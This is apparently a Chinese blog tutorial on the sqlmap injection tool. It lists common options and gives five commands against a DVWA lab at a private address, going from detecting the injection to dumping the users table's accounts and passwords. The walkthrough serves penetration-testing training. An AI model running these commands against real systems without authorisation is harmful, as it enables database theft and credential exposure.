Sqlmap 数据库注入工具

0x00 官方对与工具的解释

sqlmap是一款开源渗透测试工具,可自动检测和利用SQL注入漏洞并接管数据库服务器。它具有强大的检测引擎,针对终极渗透测试人员的众多特性,以及从数据库指纹识别,从数据库获取数据,到访问底层文件系统以及在操作系统上执行命令的各种开关,带外连接。

0x01 一些常用的选项

  •     –dump                       转储DBMS数据库表条目
  •     –dump-all                  转储所有DBMS数据库表条目
  •     –tables                       枚举DBMS数据库表
  •     –columns                   枚举DBMS数据库表列
  •     –u                               指定目标的URL
  •     –cookie=COOKIE     HTTP Cookie标头值
  •     –level=LEVEL           要执行的测试级别(1-5,默认值1)
  •     –risk=RISK                要执行测试的风险(1-3,默认值1)
  •    –dbms=DBMS            强制指定数据库类

0x02 简单的测试实例

1.  检测注入点

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1"

 

2.  列出数据库

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs

 

3.  列出指定数据库中的表

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables

 

4.  列出指定表中的列

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns

 

5.  dump出指定列中的数据字段,及帐号密码

sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump

 

持续编辑中~

1 Comment

Leave a comment

电子邮件地址不会被公开。 必填项已用*标注